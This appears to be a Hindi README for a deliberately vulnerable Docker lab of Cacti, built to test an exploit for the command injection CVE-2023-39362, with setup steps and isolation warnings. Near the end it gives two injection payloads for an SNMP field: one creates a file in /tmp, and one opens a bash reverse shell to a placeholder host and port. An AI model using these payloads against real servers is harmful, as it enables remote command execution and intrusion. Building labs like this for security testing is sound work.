
चेतावनी: यह Cacti कमांड इंजेक्शन (CVE-2023-39362) के एक्सप्लॉइट का परीक्षण करने के लिए एक कमजोर एप्लिकेशन है। इसे अपने जोखिम पर चलाएँ!
यह Cacti भेद्यता (CVE-2023-39362) के लिए एक्सप्लॉइट का परीक्षण करने हेतु एक संवेदनशील एप्लिकेशन है।
इस एप्लिकेशन में गंभीर सुरक्षा भेद्यताएं हैं। इसे अपने जोखिम पर चलाएं! अनुशंसा की जाती है कि एक बैकअप और सुरक्षित वातावरण (जैसे हालिया स्नैपशॉट और होस्ट-ओनली नेटवर्किंग वाला VM) उपयोग करें। इस एप्लिकेशन को किसी भी इंटरनेट-सामना करने वाले सर्वर पर अपलोड न करें, क्योंकि वे समझौता कर लिए जाएंगे।
अस्वीकरण: मैं इस बात की ज़िम्मेदारी नहीं लेता कि कोई भी इस एप्लिकेशन का उपयोग किस प्रकार करता है। इस एप्लिकेशन का एकमात्र उद्देश्य CVE-2023-39362 एक्सप्लॉइट के लिए एक परीक्षण परिदृश्य होना है और इसका दुर्भावनापूर्ण उपयोग नहीं किया जाना चाहिए। यदि इस एप्लिकेशन की स्थापना के माध्यम से आपका सर्वर समझौता किया जाता है, तो यह मेरी ज़िम्मेदारी नहीं है, यह उन व्यक्ति(ों) की ज़िम्मेदारी है जिन्होंने इसे अपलोड और इंस्टॉल किया।
वातावरण सेटअप करने के चरण यहां दिए गए हैं:
docker compose up -d लॉन्च करें।admin/admin हैं।admin के रूप में लॉगिन करें।guest उपयोगकर्ता पर क्लिक करें।guest के रूप में फिर से लॉगिन करें।कंटेनर का नाम vuln-cacti होगा।
परीक्षण SNMP डिवाइस के लिए होस्टनाम monitored_snmp_device है।
वातावरण को teardown करने के लिए docker compose down कमांड का उपयोग करें।
Cacti की आधिकारिक स्थापना मार्गदर्शिका यहां पाई जा सकती है।
भेद्यता का विस्तृत मूल कारण मूल सुरक्षा सलाह या मेरे ब्लॉग पोस्ट में उपलब्ध है।
(यह केवल एक संभावित एक्सप्लॉइट है)
public\' ; touch /tmp/m3ssap0 ; \'./tmp के अंतर्गत बनाई गई फ़ाइल की उपस्थिति की जांच करें।रिवर्स शेल प्राप्त करने के लिए, निम्न जैसा पेलोड उपयोग किया जा सकता है।
public\' ; bash -c "exec bash -i &>/dev/tcp/<host>/<port> <&1" ; \'
यह प्रोजेक्ट Unlicense के तहत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।